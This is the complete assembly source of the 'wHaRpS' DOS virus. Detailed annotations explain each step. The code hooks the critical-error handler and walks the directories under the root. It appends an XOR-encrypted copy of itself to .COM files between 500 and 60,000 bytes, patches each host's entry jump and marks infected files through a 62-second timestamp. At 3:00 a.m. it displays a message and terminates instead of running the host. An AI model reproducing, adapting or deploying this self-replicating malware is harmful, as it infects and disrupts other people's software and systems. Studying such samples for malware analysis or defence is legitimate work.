; "One must crawl before one walks."
|
|||
|
; wHaRpS Virus 1.0
|
|||
|
; wHaRpS virus of independent virus writer FirstStrike
|
|||
|
; For use by [Phalcon\Skism] ONLY!
|
|||
|
; Special thanx to:
|
|||
|
; Gheap
|
|||
|
; Dark Angel
|
|||
|
; Demogorgon
|
|||
|
|
|||
|
|
|||
|
name wHaRpS
|
|||
|
title
|
|||
|
code segment
|
|||
|
assume cs:code,ds:code
|
|||
|
org 100h
|
|||
|
|
|||
|
|
|||
|
dta equ 65000d ; DTA address to be set
|
|||
|
fname equ 65000d + 1eh ; DTA - file name
|
|||
|
ftime equ 65000d + 16h ; DTA - file time
|
|||
|
fsize equ 65000d + 1ah ; DTA - file size
|
|||
|
orgdir equ 65400d ; original path storage
|
|||
|
date equ 65300d ; store file date
|
|||
|
time equ 65302d ; store file time
|
|||
|
attrib equ 65304d ; store file attrib
|
|||
|
err1 equ 65306d ; old error handler address
|
|||
|
err2 equ 65308d ; old error handler address
|
|||
|
|
|||
|
olddta equ 80h ; original DTA address
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; Entry stub.  In an infected host the E9h jump patched at offset 100h lands
; here.  infect stores the host's raw size as the jump displacement, so the
; landing point is begin+3 - apparently what the three nops are for.
; call/pop leaves the load address of `setup` in BP; subtracting its
; assembled offset yields the "delta offset" that every [bp+label]
; reference below relies on, since the body sits at a different offset in
; each host.
begin:
nop
nop
nop
call setup ; find "delta offset"
setup:
pop bp
sub bp, offset setup
; NOTE(review): control passes straight to main; no call to crypt_em
; appears in this stub, so the XOR transform applied to [main, end_crypt)
; just before the write in `infect` is not reversed at entry.  What an
; infected host does with a non-zero key cannot be told from this listing.
jmp main ; DEBUG E8 02 00
nop
jmp main
; crypt_em: in-place XOR of the byte range [main, end_crypt) with the single
; key byte stored at encrypt_val (self-modifying code).  lodsb reads DS:SI
; and stosb writes ES:DI over the same range, which presumes DS=ES=CS as
; DOS sets up for a .COM program.  Key 0 (the assembled value) is the
; identity transform.  Clobbers SI, DI, CX, AL and flags.
crypt_em:
xor di,di
lea si, [bp+main]
mov di, si
mov cx, end_crypt - main

xor_loop:
lodsb ; ds:[si] -> al
db 34h ; xor al, XX
; The byte below is the imm8 operand of the `xor al,imm8` opcode emitted
; above.  crypt_change overwrites it at run time with the hundredths-of-a-
; second value from the system clock.
encrypt_val db 0 ; Starting encryption value is 0
stosb ; al ->es:[di]
loop xor_loop
ret
; main: first code run after the delta offset is known.  Copies the host's
; original first three bytes (saveins) back to CS:0100h so the host can be
; started from `done`, then goes on to record system state.  The rep movsb
; destination is ES:DI, so this also relies on ES=CS.
main:
xor di,di
mov di,0100h ; Restore first three
lea si,[bp+saveins] ; original program bytes
mov cx,0003d
rep movsb
jmp system_pic ; Take a "picture" of system settings

; handler: replacement INT 24h (critical error) handler installed by errorh.
; Returning AL=0 tells DOS to ignore the error, which suppresses the
; "Abort, Retry, Fail?" prompt while the infection loop runs.  The `endp`
; that follows has no matching `proc`; kept as in the source.
handler: ; error handler
mov al,0
iret
endp
; In-body data.  Everything here is referenced through [bp+label] and is
; copied into every host as part of the endcode-begin write.
data label byte
wharps db '[wHaRpS]',0 ; wHaRpS ID
; This string contains non-ASCII bytes that arrive mis-encoded in this
; mirror (the '<72>'/'<EFBFBD>' fragments); kept exactly as found.
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Me
; Filespec for the directory scan ('*.' = names without an extension),
; paired with attribute mask 10h in find_first_dir.
dir_mask db '*.',0 ; dir atrib
allcom db '*.COM',0 ; what to search for
root db '\',0 ; root
; Host's original first three bytes.  Overwritten by the 3-byte read in
; `infect`; main copies them back to CS:0100h before the host is run.
saveins db 0e8h,00h,00h ; original three bytes
; Directory-walk counters: `ultimate` is the ordinal of the root
; subdirectory to enter on this pass, `current` counts matches seen so far.
ultimate dw 0 ; ultimate dir to be reached
current dw 0 ; current dir
; Payload text, '$'-terminated for INT 21h/AH=09h.
message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $'
; system_pic: record state that `done` later restores, then choose between
; payload and infection.  INT 21h/AH=47h writes the current directory of
; the default drive (DL=0) as an ASCIIZ path to DS:SI.
system_pic: ; SNAP!
mov ah,47h ; get original path
mov dl,0
lea si,cs:orgdir ; store original path
int 21h

; crypt_change: INT 21h/AH=2Ch returns CH=hour, CL=minutes, DH=seconds,
; DL=hundredths.  The hundredths byte becomes the XOR key patched into
; crypt_em; hour and minute gate the payload.
crypt_change: ; set crypt value
mov ah,2ch
int 21h
mov [bp+encrypt_val],dl
; Trigger condition, part 1: hour == 3.
cmp ch,03
jz more
jmp errorh

more:
; Trigger condition, part 2: minute == 0, i.e. the clock reads 03:00.
cmp cl,00
jz bomb
jmp errorh

; bomb: payload.  Prints `message` (AH=09h, '$'-terminated string at
; DS:DX) and terminates the process with AH=4Ch - the host is not run and
; nothing is infected on this path.
bomb:
mov ah,09h
lea dx,[bp+message]
int 21h
mov ah,4ch
int 21h

; errorh: hook the critical-error vector.  AX=3524h returns the current
; INT 24h vector in ES:BX, saved to err1 (offset) / err2 (segment); then
; AX=2524h points INT 24h at DS:DX.  The delta offset is applied to the
; handler address but DS is left untouched, so this presumes DS=CS.
errorh:
push es ; save original error handler address
mov ax,3524h
int 21h
mov word ptr cs:err1,bx
mov word ptr cs:err2,es
pop es

mov ax,2524h ; set an error handler
lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals
int 21h
jmp pre_search
; drop_to_root / set_path: two entry points into a single chdir
; (INT 21h/AH=3Bh, DS:DX = ASCIIZ path).  drop_to_root uses the '\'
; string; set_path uses the name of the directory entry just returned in
; the DTA (fname).  Carry on failure is not checked by the callers.
drop_to_root: ; subroutine to visit the root
lea dx,[bp+root]
jmp continue

set_path: ; OR set a path
lea dx,cs:fname

continue:
mov ah,3bh
int 21h
ret

; return_to_search: reached when the current directory has no (more)
; eligible .COM files.  Bumps `ultimate` so the next pass enters the next
; subdirectory of the root, resets the running count, and restarts the
; directory scan from the root.  Only one level below the root is ever
; visited.
return_to_search:
inc [bp+ultimate]
call drop_to_root
mov [bp+current],0000
jmp find_first_dir
; pre_search: INT 21h/AH=1Ah moves the DTA to the private area at `dta`
; (restored to PSP:80h in `done`), zeroes the directory counters and
; starts the walk from the root.
pre_search: ; set a DTA
mov dx,dta
mov ah,1ah
int 21h

mov [bp+current],0000 ; zero the counters
mov [bp+ultimate],0000 ; ""
inc [bp+ultimate] ; want to search 1st dir in root
call drop_to_root ; bomb to root

; find_first_dir: INT 21h/AH=4Eh with filespec '*.' and attribute mask 10h
; (CX=16, directory) enumerates subdirectories of the root.  DOS attribute
; masks are inclusive, so extension-less ordinary files match as well and
; are counted by dir_test like directories.  Carry set = no match.
find_first_dir: ; directory searchin'
lea dx,[bp+dir_mask]
mov cx,16
mov ah,4Eh
int 21h
jc almost_done ; no directories?

; dir_test: count matches until the `ultimate`-th one, chdir into it
; (set_path uses the DTA file name) and look for .COM files there.
dir_test:
inc [bp+current] ; directory found - MARK!
mov bx,[bp+current]
cmp word ptr [bp+ultimate],bx ; is it the one we want?
jnz find_next_dir ; no, find another
call set_path ; yes, set the correct path
jmp find_first_file ; find some .COMs

; find_next_dir: INT 21h/AH=4Fh continues the enumeration from the DTA.
; Running out of matches ends the whole run.
find_next_dir: ; mo' directory searchin'
mov ah,4fh
int 21h
jc almost_done
jmp dir_test ; go see if correct dir found yet

; find_first_file: FindFirst for '*.COM' with attribute mask 1 (read-only
; included; normal files always match).
find_first_file: ; file searchin'
lea dx,[bp+allcom]
mov cx,00000001b
mov ah,4Eh
int 21h
jc return_to_search ; no .COM so mo' dir
jmp check_if_ill ; is the file "sick"?

; find_next_file: next '*.COM' match in the same directory.
find_next_file: ; keep on a searchin'
mov ah,4fh
int 21h
jc return_to_search ; no more .COM so back
; to the directories

; check_if_ill: eligibility test on the DTA entry.
;  - Infection marker: the low 5 bits of the DOS time word are the
;    seconds/2 field; a value of 31 (62 s) is what attrib_stuff writes on
;    infected files, so such files are skipped.
;  - Size window: files above 60000 or below 500 bytes are skipped.  fsize
;    is a dword in the DTA; which operand size the assembler picks for
;    `cmp cs:fsize,imm` is not visible here - presumably a word compare.
check_if_ill: ; check file's health
mov ax,cs:ftime
and al,11111b ; good, your sick!
cmp al,62d/2 ; (No more 62 seconds as virus
jz find_next_file ; markers! - I swear!)

cmp cs:fsize,60000d ; whoa, file to big!
ja find_next_file ; so, get a new one

cmp cs:fsize,500d ; whoa, file to small!
jb find_next_file ; throw it back and move on
jmp infect ; perfect, for infection

db 'Joy J.',0 ; don't ask

; error / pre_done / almost_done: shared exit labels; all lead to `done`.
error:
pre_done:
almost_done:
jmp done ; in case of emergency.....
; infect: append the body to the file whose DTA entry passed check_if_ill.
; Each INT 21h call's carry flag is checked; failures go to the shared
; exit.  The file handle is kept in BX from the open onward.
infect:
; AX=4300h: get attributes of the ASCIIZ name at DS:DX -> CX.  mov does not
; touch flags, so the jc still sees the INT 21h result.
mov ah,43h ; save original attribute
mov al,00h
lea dx,cs:[fname]
int 21h
mov cs:attrib,cx
jc pre_done

; AX=4301h: set attributes from CX.  Only bit 0 (read-only) is cleared;
; the remaining attribute bits stay as they were.
mov ax,4301h ; clear all attributes
and cx,11111110b ; (none shall slow progress)
int 21h
jc pre_done

; AX=3D02h: open read/write; the handle comes back in AX and is moved to BX.
mov ax,3d02h ; open the file, please
int 21h
jc pre_done
xchg bx,ax

; AX=5700h: get file time (CX) and date (DX); stashed for attrib_stuff.
mov ax,5700h ; save the date/time
int 21h
mov cs:time,cx
mov cs:date,dx
jc pre_done

; AH=3Fh: read CX bytes from handle BX into DS:DX - the host's first three
; bytes land in saveins inside the body, so they travel with the copy.
mov ah,3Fh ; read first 3 bytes of file
mov cx,0003h ; to be infected and save
lea dx,[bp+saveins]
int 21h
jc pre_done

; AX=4202h: seek to end (CX:DX = 0); returns the new position in DX:AX.
; The low word (= host size, under 60000) becomes the E9h displacement.
mov ax,4202h ; move to end of file
xor cx,cx
xor dx,dx
int 21h
jc pre_done
mov [bp+new_jmp],ax

; XOR-transform [main, end_crypt) in memory with the key set in
; crypt_change.  end_crypt is placed right after this call so execution
; resumes in untouched code; everything before it (main, handler, the
; search loop and this call site) is now transformed and is written to the
; host in that form.
call crypt_em

end_crypt label byte ; encrypt to here

; AH=40h: write CX bytes from DS:DX to handle BX - the whole image from
; begin to endcode, appended at the end-of-file position reached above.
mov ah,40h
mov cx,endcode-begin
lea dx,[bp+begin]
int 21h ; encrypt n' write virus to end of
jc done ; file

; AX=4200h: seek to absolute offset 0.
mov ax,4200h ; go to beginning of file
xor cx,cx
xor dx,dx
int 21h
jc done
jmp cont

; The 3-byte patch written over the host's entry: E9h plus the 16-bit
; displacement filled in above.  It sits inline in the code stream and is
; skipped by the jmp.
jmpc db 0e9h
new_jmp dw ?

cont:
; AH=40h again: CX was zeroed for the seek and is presumably still 0, so
; CL=3 gives a 3-byte write at offset 0.
mov ah,40h
mov cl,3
lea dx,[bp+jmpc]
int 21h
jc done

attrib_stuff:
; AX=5701h: restore the saved time/date, with the low 5 bits of the time
; word (seconds/2) forced to 31 - the 62-second marker check_if_ill tests.
mov ax,5701h
mov cx,cs:[time]
mov dx,cs:[date]
or cl,11111b
int 21h
jc done

; AH=3Eh: close handle BX.
mov ah,3eh
int 21h
jc done

; AX=4301h: put the original attributes back.
mov ax,4301h
mov cx,cs:[attrib]
lea dx,cs:[fname]
int 21h
jc done

; done: shared exit - undo the system changes, then run the host.
done:
; AH=1Ah: DTA back to the default at PSP:0080h.
mov dx,olddta ; restore all changes
mov ah,1ah
int 21h

; AX=2524h: set INT 24h from DS:DX.  `lea` yields the effective addresses
; of err2/err1 - i.e. the equ constants themselves - not the words stored
; there, so the vector installed here is built from those constants rather
; than from the values saved in errorh.  Described as observed; intent is
; not inferred.
push ds
mov ax,2524h
lea dx,cs:[err2]
mov ds,dx
lea dx,cs:[err1]
int 21h
pop ds

; AH=3Bh: chdir.  DX holds the character value 2Fh, so the path DOS reads
; is whatever ASCIIZ text sits at DS:002Fh (inside the PSP, with DS=CS).
; Then chdir back to the directory saved in orgdir at start-up.
mov ah,3bh
mov dx,'/'
int 21h

mov ah,3bh
lea dx,cs:[orgdir]
int 21h

; Transfer to the host's restored first bytes at CS:0100h.
xor di,di
mov di,0100h
jmp di ; good_bye
; endcode: end of the byte range written to hosts (endcode-begin bytes).
endcode label byte

code ends
; Entry point of the stand-alone .COM build is `begin`.
end begin